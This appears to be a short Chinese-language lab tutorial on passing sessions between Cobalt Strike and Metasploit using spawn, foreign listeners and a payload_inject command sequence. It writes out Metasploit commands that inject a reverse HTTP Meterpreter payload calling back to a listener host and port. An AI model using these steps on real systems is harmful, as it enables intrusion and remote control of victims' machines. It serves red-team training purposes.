文中通过详细讲解CobaltStrike工具,更加深入的掌握CobaltStrike用法;文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。
Cobalt Strike 与 MSF联动
使用 spawn 命令来为一个监听器派生一个会话。此 spawn 命令接受一个架构(如:x86,x64)和一个监听器作为其参数。默认情况下, spawn 命令会在 rundll32.exe 中派生一个会话。
首先新建立了一个9999端口的监听器:
spawn 监听器名
使用spawn生成新的会话,而且这个会话调用的是rundll32.exe,是在内存中运行的dll文件:
在我们的渗透测试中,通常会使用到将CS生成的session派生至我们的MSF中,反之也是一样。
注:这里不论是CS->MSF 还是MSF->CS ,在MSF中使用的payload都是HTTP的,而非TCP:
CS->MSF:
我们首先在MSF建立监听:
在CS中使用foreign建立外部监听:
然后利用spawn将CS会话派生至MSF中:
spawn CS->MSF
MSF ->CS
将msf中的session反弹到CS上,我们需要使用 payload_inject 模块:
use windows/local/payload_inject
set disablepayloadhandler true # 注:这条很重要,主要目的是禁止msf监听
set payload windows/meterpreter/reverse_http
set lhost 192.168.1.7
set lport 7777
set session 1
exploit
同样在CS中建立一个监听:
执行后,成功回连: